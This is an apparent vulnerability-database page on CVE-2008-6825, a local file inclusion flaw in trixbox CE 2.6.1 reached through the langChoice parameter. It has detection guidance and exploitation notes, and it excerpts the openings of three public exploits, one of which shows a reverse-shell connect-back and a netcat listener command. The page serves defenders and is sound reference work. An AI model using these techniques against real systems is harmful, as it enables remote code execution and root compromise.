CVE-2008-6825
published 2009-06-05CVE-2008-6825: Directory traversal vulnerability in user/index.php in Fonality trixbox CE 2.6.1 and earlier allows remote attackers to include and execute arbitrary files via…
PriorityP348medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
20.27%
97.1th percentile
Directory traversal vulnerability in user/index.php in Fonality trixbox CE 2.6.1 and earlier allows remote attackers to include and execute arbitrary files via a .. (dot dot) in the langChoice parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trixbox | trixbox | <= 2.6.1 | — |
| trixbox | trixbox | — | — |
| trixbox | trixbox | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect POST requests to /user/index.php containing directory traversal sequences (../../) in the langChoice parameter, especially targeting /tmp/sess_ paths with a null byte (%00) terminator. ↗
- →Two-stage attack pattern: first POST injects PHP payload into langChoice (session file poisoning), second POST traverses to /tmp/sess_<id>%00 to trigger execution. Alert on sequential POSTs to /user/index.php where the second request contains a /tmp/sess_ path traversal. ↗
- →Look for null byte (%00) in the langChoice POST parameter, used to truncate the file path and bypass extension checks. ↗
- →Detect PHP code injection patterns in the langChoice POST body, such as opening PHP tags or exec/shell function calls embedded in the parameter value. ↗
- →Fingerprint vulnerable trixbox instances by checking HTTP response body for the pattern: v2.6.1 ©2008 Fonality ↗
- ·The maximum usable payload space is constrained by Apache's LimitRequestFieldSize header limit (8190 bytes minus 23 bytes buffer), limiting shellcode size in the injection phase. ↗
- ·The sudo-based root shell escalation path works only on more recent trixbox versions; older versions may only yield an asterisk-uid shell. ↗
- ·After exploitation, the injected PHP payload is left in /tmp/ and must be cleaned up manually; the Metasploit module does not perform automatic cleanup. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)
exploitdb·2011-01-08
CVE-2008-6825 Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)
Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)
---
##
# $Id: trixbox_langchoice.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# -*- coding: utf-8 -*-
require 'msf/core'
class Metasploit3 'Trixbox langChoice PHP Local File Inclusion',
'Description' => %q{
This module injects php into the trixbox session file and then, in a second call, evaluates
that code by manipulating the langChoice parameter as described in OSVDB-50421.
},
'Author' => ['chao-mu'],
'License' => BSD_LICENSE,
'Version' => '$Revision: 11516 $',
Exploit-DB
Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution
exploitdb·2008-07-12
CVE-2008-6825 Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution
Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution
---
#!/usr/bin/python
# TrixBox 2.6.1 langChoice remote root exploit
# muts from offensive-security.com
# All credits to Jean-Michel BESNARD
# Same same, but different.
# http://www.offensive-security.com/0day/trixbox.py.txt
##################################################################################################
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# uname -a
# Linux trixbox1.localdomain 2.6.25.7 #4 SMP Tue Jun 17 19:35:11 EDT 2008 i686 i686 i386 GNU/Linux
##################################################################################################
import sys
from socket import *
import re
import os
from time import sleep
print ("[*] BY THE POWER OF GRAYS
Exploit-DB
Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)
exploitdb·2008-07-09
CVE-2008-6825 Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)
Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)
---
#!/usr/bin/perl -w
# Jean-Michel BESNARD / LEXSI Audit
# 2008-07-09
# This is an update of the previous exploit. We can now get a root shell, thanks to sudo.
#
# perl trixbox_fi_v2.pl 192.168.1.212
# Please listen carefully as our menu option has changed
# Choose from the following options:
# 1> Remote TCP shell
# 2> Read local file
# 1
# Host and port the reverse shell should connect to ? (:): 192.168.1.132:4444
# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]
# root
# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)
# Press enter to continue...
# done...
# nc -l -v -p 4444
# listening on [any] 4444
Metasploit
Trixbox langChoice PHP Local File Inclusion
metasploit
Trixbox langChoice PHP Local File Inclusion
Trixbox langChoice PHP Local File Inclusion
This module injects php into the trixbox session file and then, in a second call, evaluates that code by manipulating the langChoice parameter as described in OSVDB-50421.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2008-07/0101.htmlhttp://osvdb.org/50421http://www.securityfocus.com/bid/30135https://exchange.xforce.ibmcloud.com/vulnerabilities/43686https://www.exploit-db.com/exploits/6026http://archives.neohapsis.com/archives/fulldisclosure/2008-07/0101.htmlhttp://osvdb.org/50421http://www.securityfocus.com/bid/30135https://exchange.xforce.ibmcloud.com/vulnerabilities/43686https://www.exploit-db.com/exploits/6026
2009-06-05
Published